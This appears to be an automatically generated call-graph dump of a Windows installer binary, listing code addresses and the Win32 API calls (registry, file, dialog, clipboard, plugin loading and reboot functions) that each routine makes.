API calls 5226->5228 5227->5223 5232 405a78 2 API calls 5227->5232 5233 40483e 5227->5233 5229 4047f3 GetDiskFreeSpaceA 5228->5229 5231 404817 MulDiv 5229->5231 5229->5233 5231->5233 5232->5227 5235 4048af 5233->5235 5251 404a46 5233->5251 5234 4048d2 5262 40417c KiUserCallbackDispatcher 5234->5262 5235->5234 5237 40140b 2 API calls 5235->5237 5237->5234 5239 4048b1 SetDlgItemTextA 5239->5235 5240 4048a1 5254 404981 5240->5254 5243 4048ee 5243->5244 5245 404523 SendMessageA 5243->5245 5244->5197 5245->5244 5246->5192 5247->5216 5248->5201 5249->5218 5250->5226 5252 404981 20 API calls 5251->5252 5253 40489c 5252->5253 5253->5239 5253->5240 5256 404997 5254->5256 5255 4060bb 17 API calls 5257 4049fb 5255->5257 5256->5255 5258 4060bb 17 API calls 5257->5258 5259 404a06 5258->5259 5260 4060bb 17 API calls 5259->5260 5261 404a1c lstrlenA wsprintfA SetDlgItemTextA 5260->5261 5261->5235 5262->5243 4217 4020cb 4218 402ac1 17 API calls 4217->4218 4219 4020d2 4218->4219 4220 402ac1 17 API calls 4219->4220 4221 4020dc 4220->4221 4222 402ac1 17 API calls 4221->4222 4223 4020e6 4222->4223 4224 402ac1 17 API calls 4223->4224 4225 4020f0 4224->4225 4226 402ac1 17 API calls 4225->4226 4227 4020fa 4226->4227 4228 40213c CoCreateInstance 4227->4228 4229 402ac1 17 API calls 4227->4229 4232 40215b 4228->4232 4234 402206 4228->4234 4229->4228 4231 40223c 4233 4021e6 MultiByteToWideChar 4232->4233 4232->4234 4233->4234 4234->4231 4235 401423 4234->4235 4236 4051c0 24 API calls 4235->4236 4237 401431 4236->4237 4237->4231 5263 1000180d 5264 10001830 5263->5264 5265 10001860 GlobalFree 5264->5265 5266 10001872 5264->5266 5265->5266 5267 10001266 2 API calls 5266->5267 5268 100019e3 GlobalFree GlobalFree 5267->5268 5269 4026ce 5270 4026d4 5269->5270 5271 4026d8 FindNextFileA 5270->5271 5274 4026ea 5270->5274 5272 402729 5271->5272 5271->5274 5275 406099 lstrcpynA 5272->5275 5275->5274 4677 4023d0 4678 402ac1 17 API calls 4677->4678 4679 4023e2 4678->4679 4680 402ac1 17 API calls 4679->4680 4681 4023ec 4680->4681 4694 402b51 4681->4694 4684 402421 4685 40242d 4684->4685 4687 402a9f 17 API calls 4684->4687 4688 40244c RegSetValueExA 4685->4688 4690 40303e 44 API calls 4685->4690 4686 402ac1 17 API calls 4689 40241a lstrlenA 4686->4689 4687->4685 4691 402462 RegCloseKey 4688->4691 4689->4684 4690->4688 4693 402716 4691->4693 4695 402b6c 4694->4695 4698 405f4d 4695->4698 4699 405f5c 4698->4699 4700 4023fc 4699->4700 4701 405f67 RegCreateKeyExA 4699->4701 4700->4684 4700->4686 4700->4693 4701->4700 5276 401cd4 5277 402a9f 17 API calls 5276->5277 5278 401cda IsWindow 5277->5278 5279 401a0e 5278->5279 4702 4014d6 4703 402a9f 17 API calls 4702->4703 4704 4014dc Sleep 4703->4704 4706 402951 4704->4706 4707 401759 4708 402ac1 17 API calls 4707->4708 4709 401760 4708->4709 4710 401786 4709->4710 4711 40177e 4709->4711 4748 406099 lstrcpynA 4710->4748 4747 406099 lstrcpynA 4711->4747 4714 401784 4718 406303 5 API calls 4714->4718 4715 401791 4716 405a31 3 API calls 4715->4716 4717 401797 lstrcatA 4716->4717 4717->4714 4731 4017a3 4718->4731 4719 40639c 2 API calls 4719->4731 4720 4017e4 4721 405c0d 2 API calls 4720->4721 4721->4731 4723 4017ba CompareFileTime 4723->4731 4724 40187e 4725 4051c0 24 API calls 4724->4725 4728 401888 4725->4728 4726 4051c0 24 API calls 4735 40186a 4726->4735 4727 406099 lstrcpynA 4727->4731 4729 40303e 44 API calls 4728->4729 4730 40189b 4729->4730 4732 4018af SetFileTime 4730->4732 4734 4018c1 FindCloseChangeNotification 4730->4734 4731->4719 4731->4720 4731->4723 4731->4724 4731->4727 4733 4060bb 17 API calls 4731->4733 4742 4057b5 MessageBoxIndirectA 4731->4742 4745 401855 4731->4745 4746 405c32 GetFileAttributesA CreateFileA 4731->4746 4732->4734 4733->4731 4734->4735 4736 4018d2 4734->4736 4737 4018d7 4736->4737 4738 4018ea 4736->4738 4740 4060bb 17 API calls 4737->4740 4739 4060bb 17 API calls 4738->4739 4741 4018f2 4739->4741 4743 4018df lstrcatA 4740->4743 4744 4057b5 MessageBoxIndirectA 4741->4744 4742->4731 4743->4741 4744->4735 4745->4726 4745->4735 4746->4731 4747->4714 4748->4715 5280 401659 5281 402ac1 17 API calls 5280->5281 5282 40165f 5281->5282 5283 40639c 2 API calls 5282->5283 5284 401665 5283->5284 5285 401959 5286 402a9f 17 API calls 5285->5286 5287 401960 5286->5287 5288 402a9f 17 API calls 5287->5288 5289 40196d 5288->5289 5290 402ac1 17 API calls 5289->5290 5291 401984 lstrlenA 5290->5291 5293 401994 5291->5293 5292 4019d4 5293->5292 5297 406099 lstrcpynA 5293->5297 5295 4019c4 5295->5292 5296 4019c9 lstrlenA 5295->5296 5296->5292 5297->5295 5298 1000161a 5299 10001649 5298->5299 5300 10001a5d 18 API calls 5299->5300 5301 10001650 5300->5301 5302 10001663 5301->5302 5303 10001657 5301->5303 5305 1000168a 5302->5305 5306 1000166d 5302->5306 5304 10001266 2 API calls 5303->5304 5314 10001661 5304->5314 5308 10001690 5305->5308 5309 100016b4 5305->5309 5307 100014e2 3 API calls 5306->5307 5312 10001672 5307->5312 5310 10001559 3 API calls 5308->5310 5311 100014e2 3 API calls 5309->5311 5313 10001695 5310->5313 5311->5314 5315 10001559 3 API calls 5312->5315 5316 10001266 2 API calls 5313->5316 5317 10001678 5315->5317 5318 1000169b GlobalFree 5316->5318 5319 10001266 2 API calls 5317->5319 5318->5314 5320 100016af GlobalFree 5318->5320 5321 1000167e GlobalFree 5319->5321 5320->5314 5321->5314 5329 401f5b 5330 402ac1 17 API calls 5329->5330 5331 401f62 5330->5331 5332 406431 5 API calls 5331->5332 5333 401f71 5332->5333 5334 401ff1 5333->5334 5335 401f89 GlobalAlloc 5333->5335 5335->5334 5336 401f9d 5335->5336 5337 406431 5 API calls 5336->5337 5338 401fa4 5337->5338 5339 406431 5 API calls 5338->5339 5340 401fae 5339->5340 5340->5334 5344 405ff7 wsprintfA 5340->5344 5342 401fe5 5345 405ff7 wsprintfA 5342->5345 5344->5342 5345->5334 5346 40255b 5347 402ac1 17 API calls 5346->5347 5348 402562 5347->5348 5351 405c32 GetFileAttributesA CreateFileA 5348->5351 5350 40256e 5351->5350 5359 401b5d 5360 401bae 5359->5360 5365 401b6a 5359->5365 5361 401bb2 5360->5361 5362 401bd7 GlobalAlloc 5360->5362 5375 4022e1 5361->5375 5380 406099 lstrcpynA 5361->5380 5364 4060bb 17 API calls 5362->5364 5363 4060bb 17 API calls 5368 4022db 5363->5368 5369 401bf2 5364->5369 5366 401b81 5365->5366 5365->5369 5378 406099 lstrcpynA 5366->5378 5373 4057b5 MessageBoxIndirectA 5368->5373 5369->5363 5369->5375 5371 401bc4 GlobalFree 5371->5375 5372 401b90 5379 406099 lstrcpynA 5372->5379 5373->5375 5376 401b9f 5381 406099 lstrcpynA 5376->5381 5378->5372 5379->5376 5380->5371 5381->5375 5382 401a5e 5383 402a9f 17 API calls 5382->5383 5384 401a64 5383->5384 5385 402a9f 17 API calls 5384->5385 5386 401a0e 5385->5386 4759 4024df 4771 402b01 4759->4771 4762 402a9f 17 API calls 4763 4024f2 4762->4763 4764 402500 4763->4764 4765 402716 4763->4765 4766 402519 RegEnumValueA 4764->4766 4767 40250d RegEnumKeyA 4764->4767 4768 40252e 4766->4768 4769 402535 RegCloseKey 4766->4769 4767->4769 4768->4769 4769->4765 4772 402ac1 17 API calls 4771->4772 4773 402b18 4772->4773 4774 405f1f RegOpenKeyExA 4773->4774 4775 4024e9 4774->4775 4775->4762 5387 402c61 5388 402c70 SetTimer 5387->5388 5389 402c89 5387->5389 5388->5389 5390 402cd7 5389->5390 5391 402cdd MulDiv 5389->5391 5392 402c97 wsprintfA SetWindowTextA SetDlgItemTextA 5391->5392 5392->5390 5401 401563 5402 4028f9 5401->5402 5405 405ff7 wsprintfA 5402->5405 5404 4028fe 5405->5404 5406 40166a 5407 402ac1 17 API calls 5406->5407 5408 401671 5407->5408 5409 402ac1 17 API calls 5408->5409 5410 40167a 5409->5410 5411 402ac1 17 API calls 5410->5411 5412 401683 MoveFileA 5411->5412 5413 401696 5412->5413 5414 40168f 5412->5414 5415 40639c 2 API calls 5413->5415 5418 40223c 5413->5418 5416 401423 24 API calls 5414->5416 5417 4016a5 5415->5417 5416->5418 5417->5418 5419 405e78 36 API calls 5417->5419 5419->5414 4826 40246d 4827 402b01 17 API calls 4826->4827 4828 402477 4827->4828 4829 402ac1 17 API calls 4828->4829 4830 402480 4829->4830 4831 40248a RegQueryValueExA 4830->4831 4833 402716 4830->4833 4832 4024aa 4831->4832 4836 4024b0 RegCloseKey 4831->4836 4832->4836 4837 405ff7 wsprintfA 4832->4837 4836->4833 4837->4836 5420 4019ed 5421 402ac1 17 API calls 5420->5421 5422 4019f4 5421->5422 5423 402ac1 17 API calls 5422->5423 5424 4019fd 5423->5424 5425 401a04 lstrcmpiA 5424->5425 5426 401a16 lstrcmpA 5424->5426 5427 401a0a 5425->5427 5426->5427 5428 40426e lstrcpynA lstrlenA 4838 40156f 4839 401586 4838->4839 4840 40157f ShowWindow 4838->4840 4841 402951 4839->4841 4842 401594 ShowWindow 4839->4842 4840->4839 4842->4841 5436 100015b3 5437 100014bb GlobalFree 5436->5437 5440 100015cb 5437->5440 5438 10001611 GlobalFree 5439 100015e6 5439->5438 5440->5438 5440->5439 5441 100015fd VirtualFree 5440->5441 5441->5438 5442 4014f4 SetForegroundWindow 5443 402951 5442->5443 5444 401cf5 5445 402a9f 17 API calls 5444->5445 5446 401cfc 5445->5446 5447 402a9f 17 API calls 5446->5447 5448 401d08 GetDlgItem 5447->5448 5449 402577 5448->5449 4849 4022f6 4850 402304 4849->4850 4851 4022fe 4849->4851 4853 402314 4850->4853 4854 402ac1 17 API calls 4850->4854 4852 402ac1 17 API calls 4851->4852 4852->4850 4855 402322 4853->4855 4857 402ac1 17 API calls 4853->4857 4854->4853 4856 402ac1 17 API calls 4855->4856 4858 40232b WritePrivateProfileStringA 4856->4858 4857->4855 5450 4026f8 5451 402ac1 17 API calls 5450->5451 5452 4026ff FindFirstFileA 5451->5452 5453 402722 5452->5453 5456 402712 5452->5456 5454 402729 5453->5454 5458 405ff7 wsprintfA 5453->5458 5459 406099 lstrcpynA 5454->5459 5458->5454 5459->5456 4866 40237b 4867 402382 4866->4867 4868 4023ad 4866->4868 4870 402b01 17 API calls 4867->4870 4869 402ac1 17 API calls 4868->4869 4871 4023b4 4869->4871 4872 402389 4870->4872 4878 402b7f 4871->4878 4874 402393 4872->4874 4875 4023c1 4872->4875 4876 402ac1 17 API calls 4874->4876 4877 40239a RegDeleteValueA RegCloseKey 4876->4877 4877->4875 4879 402b95 4878->4879 4881 402bab 4879->4881 4882 402bb4 4879->4882 4881->4875 4883 405f1f RegOpenKeyExA 4882->4883 4884 402be2 4883->4884 4885 402c5a 4884->4885 4887 402be6 4884->4887 4885->4881 4886 402c08 RegEnumKeyA 4886->4887 4888 402c1f RegCloseKey 4886->4888 4887->4886 4887->4888 4889 402c40 RegCloseKey 4887->4889 4891 402bb4 6 API calls 4887->4891 4890 406431 5 API calls 4888->4890 4889->4885 4892 402c2f 4890->4892 4891->4887 4893 402c33 4892->4893 4894 402c4e RegDeleteKeyA 4892->4894 4893->4885 4894->4885 4915 401ffd 4916 4020bd 4915->4916 4917 40200f 4915->4917 4919 401423 24 API calls 4916->4919 4918 402ac1 17 API calls 4917->4918 4920 402016 4918->4920 4926 40223c 4919->4926 4921 402ac1 17 API calls 4920->4921 4922 40201f 4921->4922 4923 402034 LoadLibraryExA 4922->4923 4924 402027 GetModuleHandleA 4922->4924 4923->4916 4925 402044 GetProcAddress 4923->4925 4924->4923 4924->4925 4927 402090 4925->4927 4928 402053 4925->4928 4931 4051c0 24 API calls 4927->4931 4929 402072 4928->4929 4930 40205b 4928->4930 4936 100016bd 4929->4936 4932 401423 24 API calls 4930->4932 4933 402063 4931->4933 4932->4933 4933->4926 4934 4020b1 FreeLibrary 4933->4934 4934->4926 4937 100016ed 4936->4937 4978 10001a5d 4937->4978 4939 100016f4 4940 1000180a 4939->4940 4941 10001705 4939->4941 4942 1000170c 4939->4942 4940->4933 5026 100021b0 4941->5026 5010 100021fa 4942->5010 4947 10001770 4953 100017b2 4947->4953 4954 10001776 4947->4954 4948 10001752 5039 100023d8 4948->5039 4949 10001722 4952 10001728 4949->4952 4957 10001733 4949->4957 4950 1000173b 4962 10001731 4950->4962 5036 10002a9f 4950->5036 4952->4962 5020 100027e4 4952->5020 4955 100023d8 11 API calls 4953->4955 4959 10001559 3 API calls 4954->4959 4969 100017a4 4955->4969 4956 10001758 5050 10001559 4956->5050 5030 10002587 4957->5030 4964 1000178c 4959->4964 4962->4947 4962->4948 4967 100023d8 11 API calls 4964->4967 4966 10001739 4966->4962 4967->4969 4968 100017f9 4968->4940 4973 10001803 GlobalFree 4968->4973 4969->4968 5061 1000239e 4969->5061 4973->4940 4975 100017e5 4975->4968 5065 100014e2 wsprintfA 4975->5065 4976 100017de FreeLibrary 4976->4975 5068 10001215 GlobalAlloc 4978->5068 4980 10001a81 5069 10001215 GlobalAlloc 4980->5069 4982 10001cbb GlobalFree GlobalFree GlobalFree 4983 10001cd8 4982->4983 4999 10001d22 4982->4999 4984 1000201a 4983->4984 4991 10001ced 4983->4991 4983->4999 4986 1000203c GetModuleHandleA 4984->4986 4984->4999 4985 10001b60 GlobalAlloc 4998 10001a8c 4985->4998 4989 10002062 4986->4989 4990 1000204d LoadLibraryA 4986->4990 4987 10001bab lstrcpyA 4992 10001bb5 lstrcpyA 4987->4992 4988 10001bc9 GlobalFree 4988->4998 5076 100015a4 GetProcAddress 4989->5076 4990->4989 4990->4999 4991->4999 5072 10001224 4991->5072 4992->4998 4994 100020b3 4995 100020c0 lstrlenA 4994->4995 4994->4999 5077 100015a4 GetProcAddress 4995->5077 4997 10001f7a 4997->4999 5003 10001fbe lstrcpyA 4997->5003 4998->4982 4998->4985 4998->4987 4998->4988 4998->4992 4998->4997 4998->4999 5004 10001e75 GlobalFree 4998->5004 5006 10001224 2 API calls 4998->5006 5008 10001c07 4998->5008 5075 10001215 GlobalAlloc 4998->5075 4999->4939 5000 10002074 5000->4994 5009 1000209d GetProcAddress 5000->5009 5003->4999 5004->4998 5006->4998 5007 100020d9 5007->4999 5008->4998 5070 10001534 GlobalSize GlobalAlloc 5008->5070 5009->4994 5011 10002212 5010->5011 5013 10002347 GlobalFree 5011->5013 5015 100022bb GlobalAlloc MultiByteToWideChar 5011->5015 5016 10001224 GlobalAlloc lstrcpynA 5011->5016 5018 10002306 5011->5018 5079 100012ad 5011->5079 5013->5011 5014 10001712 5013->5014 5014->4949 5014->4950 5014->4962 5017 100022e5 GlobalAlloc CLSIDFromString GlobalFree 5015->5017 5015->5018 5016->5011 5017->5013 5018->5013 5083 1000251b 5018->5083 5022 100027f6 5020->5022 5021 1000289b EnumWindows 5023 100028b9 5021->5023 5022->5021 5024 100029b5 5023->5024 5025 100029aa GetLastError 5023->5025 5024->4962 5025->5024 5027 100021c0 5026->5027 5028 1000170b 5026->5028 5027->5028 5029 100021d2 GlobalAlloc 5027->5029 5028->4942 5029->5027 5034 100025a3 5030->5034 5031 100025f4 GlobalAlloc 5035 10002616 5031->5035 5032 10002607 5033 1000260c GlobalSize 5032->5033 5032->5035 5033->5035 5034->5031 5034->5032 5035->4966 5037 10002aaa 5036->5037 5038 10002aea GlobalFree 5037->5038 5086 10001215 GlobalAlloc 5039->5086 5041 10002438 lstrcpynA 5048 100023e4 5041->5048 5042 10002449 StringFromGUID2 WideCharToMultiByte 5042->5048 5043 1000246d WideCharToMultiByte 5043->5048 5044 1000248e wsprintfA 5044->5048 5045 100024b2 GlobalFree 5045->5048 5046 100024ec GlobalFree 5046->4956 5047 10001266 2 API calls 5047->5048 5048->5041 5048->5042 5048->5043 5048->5044 5048->5045 5048->5046 5048->5047 5087 100012d1 5048->5087 5091 10001215 GlobalAlloc 5050->5091 5052 1000155f 5053 1000156c lstrcpyA 5052->5053 5055 10001586 5052->5055 5056 100015a0 5053->5056 5055->5056 5057 1000158b wsprintfA 5055->5057 5058 10001266 5056->5058 5057->5056 5059 100012a8 GlobalFree 5058->5059 5060 1000126f GlobalAlloc lstrcpynA 5058->5060 5059->4969 5060->5059 5062 100017c5 5061->5062 5063 100023ac 5061->5063 5062->4975 5062->4976 5063->5062 5064 100023c5 GlobalFree 5063->5064 5064->5063 5066 10001266 2 API calls 5065->5066 5067 10001503 5066->5067 5067->4968 5068->4980 5069->4998 5071 10001552 5070->5071 5071->5008 5078 10001215 GlobalAlloc 5072->5078 5074 10001233 lstrcpynA 5074->4999 5075->4998 5076->5000 5077->5007 5078->5074 5080 100012b4 5079->5080 5081 10001224 2 API calls 5080->5081 5082 100012cf 5081->5082 5082->5011 5084 10002529 VirtualAlloc 5083->5084 5085 1000257f 5083->5085 5084->5085 5085->5018 5086->5048 5088 100012f9 5087->5088 5089 100012da 5087->5089 5088->5048 5089->5088 5090 100012e0 lstrcpyA 5089->5090 5090->5088 5091->5052 5460 1000103d 5461 1000101b 5 API calls 5460->5461 5462 10001056 5461->5462 5463 4018fd 5464 401934 5463->5464 5465 402ac1 17 API calls 5464->5465 5466 401939 5465->5466 5467 405861 67 API calls 5466->5467 5468 401942 5467->5468 5469 40257d 5470 402582 5469->5470 5471 402596 5469->5471 5472 402a9f 17 API calls 5470->5472 5473 402ac1 17 API calls 5471->5473 5475 40258b 5472->5475 5474 40259d lstrlenA 5473->5474 5474->5475 5476 4025bf 5475->5476 5477 405cd9 WriteFile 5475->5477 5477->5476 5092 4052fe 5093 405320 GetDlgItem GetDlgItem GetDlgItem 5092->5093 5094 4054a9 5092->5094 5138 40418f SendMessageA 5093->5138 5096 4054b1 GetDlgItem CreateThread FindCloseChangeNotification 5094->5096 5098 4054d9 5094->5098 5096->5098 5141 405292 5 API calls 5096->5141 5097 405507 5099 405562 5097->5099 5100 40550f 5097->5100 5098->5097 5102 405528 5098->5102 5103 4054ef ShowWindow ShowWindow 5098->5103 5099->5102 5115 40556f SendMessageA 5099->5115 5104 405517 5100->5104 5105 40553b ShowWindow 5100->5105 5101 405390 5107 405397 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5101->5107 5106 4041c1 8 API calls 5102->5106 5140 40418f SendMessageA 5103->5140 5109 404133 SendMessageA 5104->5109 5111 40555b 5105->5111 5112 40554d 5105->5112 5110 405534 5106->5110 5113 405405 5107->5113 5114 4053e9 SendMessageA SendMessageA 5107->5114 5109->5102 5117 404133 SendMessageA 5111->5117 5116 4051c0 24 API calls 5112->5116 5118 405418 5113->5118 5119 40540a SendMessageA 5113->5119 5114->5113 5115->5110 5120 405588 CreatePopupMenu 5115->5120 5116->5111 5117->5099 5121 40415a 18 API calls 5118->5121 5119->5118 5122 4060bb 17 API calls 5120->5122 5124 405428 5121->5124 5123 405598 AppendMenuA 5122->5123 5125 4055b6 GetWindowRect 5123->5125 5126 4055c9 TrackPopupMenu 5123->5126 5127 405431 ShowWindow 5124->5127 5128 405465 GetDlgItem SendMessageA 5124->5128 5125->5126 5126->5110 5129 4055e5 5126->5129 5130 405454 5127->5130 5131 405447 ShowWindow 5127->5131 5128->5110 5132 40548c SendMessageA SendMessageA 5128->5132 5133 405604 SendMessageA 5129->5133 5139 40418f SendMessageA 5130->5139 5131->5130 5132->5110 5133->5133 5134 405621 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5133->5134 5136 405643 SendMessageA 5134->5136 5136->5136 5137 405665 GlobalUnlock SetClipboardData CloseClipboard 5136->5137 5137->5110 5138->5101 5139->5128 5140->5097 5478 100029bf 5479 100029d7 5478->5479 5480 10001534 2 API calls 5479->5480 5481 100029f2 5480->5481 5482 401000 5483 401037 BeginPaint GetClientRect 5482->5483 5484 40100c DefWindowProcA 5482->5484 5486 4010f3 5483->5486 5487 401179 5484->5487 5488 401073 CreateBrushIndirect FillRect DeleteObject 5486->5488 5489 4010fc 5486->5489 5488->5486 5490 401102 CreateFontIndirectA 5489->5490 5491 401167 EndPaint 5489->5491 5490->5491 5492 401112 6 API calls 5490->5492 5491->5487 5492->5491 5493 401900 5494 402ac1 17 API calls 5493->5494 5495 401907 5494->5495 5496 4057b5 MessageBoxIndirectA 5495->5496 5497 401910 5496->5497 3974 402682 3975 402689 3974->3975 3981 4028fe 3974->3981 3982 402a9f 3975->3982 3977 402690 3978 40269f SetFilePointer 3977->3978 3979 4026af 3978->3979 3978->3981 3985 405ff7 wsprintfA 3979->3985 3986 4060bb 3982->3986 3984 402ab4 3984->3977 3985->3981 4002 4060c8 3986->4002 3987 4062ea 3988 4062ff 3987->3988 4019 406099 lstrcpynA 3987->4019 3988->3984 3990 4062c4 lstrlenA 3990->4002 3991 4060bb 10 API calls 3991->3990 3995 4061e0 GetSystemDirectoryA 3995->4002 3996 4061f3 GetWindowsDirectoryA 3996->4002 3998 4060bb 10 API calls 3998->4002 3999 40626d lstrcatA 3999->4002 4000 406227 SHGetSpecialFolderLocation 4001 40623f SHGetPathFromIDListA CoTaskMemFree 4000->4001 4000->4002 4001->4002 4002->3987 4002->3990 4002->3991 4002->3995 4002->3996 4002->3998 4002->3999 4002->4000 4003 405f80 4002->4003 4008 406303 4002->4008 4017 405ff7 wsprintfA 4002->4017 4018 406099 lstrcpynA 4002->4018 4020 405f1f 4003->4020 4006 405fb4 RegQueryValueExA RegCloseKey 4007 405fe3 4006->4007 4007->4002 4009 40630f 4008->4009 4011 40636c CharNextA 4009->4011 4013 406377 4009->4013 4015 40635a CharNextA 4009->4015 4016 406367 CharNextA 4009->4016 4024 405a5c 4009->4024 4010 40637b CharPrevA 4010->4013 4011->4009 4011->4013 4013->4010 4014 406396 4013->4014 4014->4002 4015->4009 4016->4011 4017->4002 4018->4002 4019->3988 4021 405f2e 4020->4021 4022 405f32 4021->4022 4023 405f37 RegOpenKeyExA 4021->4023 4022->4006 4022->4007 4023->4022 4025 405a62 4024->4025 4026 405a75 4025->4026 4027 405a68 CharNextA 4025->4027 4026->4009 4027->4025 5498 401502 5499 40150a 5498->5499 5501 40151d 5498->5501 5500 402a9f 17 API calls 5499->5500 5500->5501 5502 404583 5503 404593 5502->5503 5504 4045b9 5502->5504 5506 40415a 18 API calls 5503->5506 5505 4041c1 8 API calls 5504->5505 5508 4045c5 5505->5508 5507 4045a0 SetDlgItemTextA 5506->5507 5507->5504 4040 401c04 4041 402a9f 17 API calls 4040->4041 4042 401c0b 4041->4042 4043 402a9f 17 API calls 4042->4043 4044 401c18 4043->4044 4045 402ac1 17 API calls 4044->4045 4046 401c2d 4044->4046 4045->4046 4047 402ac1 17 API calls 4046->4047 4051 401c3d 4046->4051 4047->4051 4048 401c94 4062 402ac1 4048->4062 4049 401c48 4052 402a9f 17 API calls 4049->4052 4051->4048 4051->4049 4054 401c4d 4052->4054 4056 402a9f 17 API calls 4054->4056 4055 402ac1 17 API calls 4057 401ca2 FindWindowExA 4055->4057 4058 401c59 4056->4058 4061 401cc0 4057->4061 4059 401c84 SendMessageA 4058->4059 4060 401c66 SendMessageTimeoutA 4058->4060 4059->4061 4060->4061 4063 402acd 4062->4063 4064 4060bb 17 API calls 4063->4064 4065 402aee 4064->4065 4066 401c99 4065->4066 4067 406303 5 API calls 4065->4067 4066->4055 4067->4066 4107 403c86 4108 403dd9 4107->4108 4109 403c9e 4107->4109 4111 403e2a 4108->4111 4112 403dea GetDlgItem GetDlgItem 4108->4112 4109->4108 4110 403caa 4109->4110 4114 403cb5 SetWindowPos 4110->4114 4115 403cc8 4110->4115 4113 403e84 4111->4113 4121 401389 2 API calls 4111->4121 4116 40415a 18 API calls 4112->4116 4137 403dd4 4113->4137 4178 4041a6 4113->4178 4114->4115 4118 403ce5 4115->4118 4119 403ccd ShowWindow 4115->4119 4120 403e14 SetClassLongA 4116->4120 4122 403d07 4118->4122 4123 403ced DestroyWindow 4118->4123 4119->4118 4124 40140b 2 API calls 4120->4124 4127 403e5c 4121->4127 4125 403d0c SetWindowLongA 4122->4125 4126 403d1d 4122->4126 4177 4040e3 4123->4177 4124->4111 4125->4137 4128 403dc6 4126->4128 4129 403d29 GetDlgItem 4126->4129 4127->4113 4130 403e60 SendMessageA 4127->4130 4200 4041c1 4128->4200 4133 403d59 4129->4133 4134 403d3c SendMessageA IsWindowEnabled 4129->4134 4130->4137 4131 40140b 2 API calls 4145 403e96 4131->4145 4132 4040e5 DestroyWindow EndDialog 4132->4177 4139 403d66 4133->4139 4142 403dad SendMessageA 4133->4142 4143 403d79 4133->4143 4151 403d5e 4133->4151 4134->4133 4134->4137 4136 404114 ShowWindow 4136->4137 4138 4060bb 17 API calls 4138->4145 4139->4142 4139->4151 4141 40415a 18 API calls 4141->4145 4142->4128 4146 403d81 4143->4146 4147 403d96 4143->4147 4144 403d94 4144->4128 4145->4131 4145->4132 4145->4137 4145->4138 4145->4141 4168 404025 DestroyWindow 4145->4168 4181 40415a 4145->4181 4194 40140b 4146->4194 4148 40140b 2 API calls 4147->4148 4150 403d9d 4148->4150 4150->4128 4150->4151 4197 404133 4151->4197 4153 403f11 GetDlgItem 4154 403f26 4153->4154 4155 403f2e ShowWindow KiUserCallbackDispatcher 4153->4155 4154->4155 4184 40417c KiUserCallbackDispatcher 4155->4184 4157 403f58 EnableWindow 4162 403f6c 4157->4162 4158 403f71 GetSystemMenu EnableMenuItem SendMessageA 4159 403fa1 SendMessageA 4158->4159 4158->4162 4159->4162 4162->4158 4185 40418f SendMessageA 4162->4185 4186 403c67 4162->4186 4189 406099 lstrcpynA 4162->4189 4164 403fd0 lstrlenA 4165 4060bb 17 API calls 4164->4165 4166 403fe1 SetWindowTextA 4165->4166 4190 401389 4166->4190 4169 40403f CreateDialogParamA 4168->4169 4168->4177 4170 404072 4169->4170 4169->4177 4171 40415a 18 API calls 4170->4171 4172 40407d GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4171->4172 4173 401389 2 API calls 4172->4173 4174 4040c3 4173->4174 4174->4137 4175 4040cb ShowWindow 4174->4175 4176 4041a6 SendMessageA 4175->4176 4176->4177 4177->4136 4177->4137 4179 4041be 4178->4179 4180 4041af SendMessageA 4178->4180 4179->4145 4180->4179 4182 4060bb 17 API calls 4181->4182 4183 404165 SetDlgItemTextA 4182->4183 4183->4153 4184->4157 4185->4162 4187 4060bb 17 API calls 4186->4187 4188 403c75 SetWindowTextA 4187->4188 4188->4162 4189->4164 4192 401390 4190->4192 4191 4013fe 4191->4145 4192->4191 4193 4013cb MulDiv SendMessageA 4192->4193 4193->4192 4195 401389 2 API calls 4194->4195 4196 401420 4195->4196 4196->4151 4198 404140 SendMessageA 4197->4198 4199 40413a 4197->4199 4198->4144 4199->4198 4201 4041d9 GetWindowLongA 4200->4201 4211 404262 4200->4211 4202 4041ea 4201->4202 4201->4211 4203 4041f9 GetSysColor 4202->4203 4204 4041fc 4202->4204 4203->4204 4205 404202 SetTextColor 4204->4205 4206 40420c SetBkMode 4204->4206 4205->4206 4207 404224 GetSysColor 4206->4207 4208 40422a 4206->4208 4207->4208 4209 404231 SetBkColor 4208->4209 4210 40423b 4208->4210 4209->4210 4210->4211 4212 404255 CreateBrushIndirect 4210->4212 4213 40424e DeleteObject 4210->4213 4211->4137 4212->4211 4213->4212 4238 40330d SetErrorMode GetVersion 4239 40334e 4238->4239 4240 403354 4238->4240 4241 406431 5 API calls 4239->4241 4329 4063c3 GetSystemDirectoryA 4240->4329 4241->4240 4243 40336a lstrlenA 4243->4240 4244 403379 4243->4244 4332 406431 GetModuleHandleA 4244->4332 4247 406431 5 API calls 4248 403387 4247->4248 4249 406431 5 API calls 4248->4249 4250 403393 #17 OleInitialize SHGetFileInfoA 4249->4250 4338 406099 lstrcpynA 4250->4338 4253 4033df GetCommandLineA 4339 406099 lstrcpynA 4253->4339 4255 4033f1 GetModuleHandleA 4256 403408 4255->4256 4257 405a5c CharNextA 4256->4257 4258 40341c CharNextA 4257->4258 4267 40342c 4258->4267 4259 4034f6 4260 403509 GetTempPathA 4259->4260 4340 4032dc 4260->4340 4262 403521 4264 403525 GetWindowsDirectoryA lstrcatA 4262->4264 4265 40357b DeleteFileA 4262->4265 4263 405a5c CharNextA 4263->4267 4268 4032dc 12 API calls 4264->4268 4350 402d98 GetTickCount GetModuleFileNameA 4265->4350 4267->4259 4267->4263 4269 4034f8 4267->4269 4271 403541 4268->4271 4447 406099 lstrcpynA 4269->4447 4270 40358f 4272 403625 4270->4272 4276 403615 4270->4276 4280 405a5c CharNextA 4270->4280 4271->4265 4274 403545 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4271->4274 4464 4037f7 4272->4464 4275 4032dc 12 API calls 4274->4275 4278 403573 4275->4278 4380 4038e9 4276->4380 4278->4265 4278->4272 4282 4035aa 4280->4282 4291 4035f0 4282->4291 4292 403655 4282->4292 4283 40375d 4285 403765 GetCurrentProcess OpenProcessToken 4283->4285 4286 4037df ExitProcess 4283->4286 4284 40363f 4473 4057b5 4284->4473 4288 4037b0 4285->4288 4289 403780 LookupPrivilegeValueA AdjustTokenPrivileges 4285->4289 4294 406431 5 API calls 4288->4294 4289->4288 4448 405b1f 4291->4448 4436 405720 4292->4436 4298 4037b7 4294->4298 4302 4037cc ExitWindowsEx 4298->4302 4305 4037d8 4298->4305 4300 403676 lstrcatA lstrcmpiA 4300->4272 4304 403692 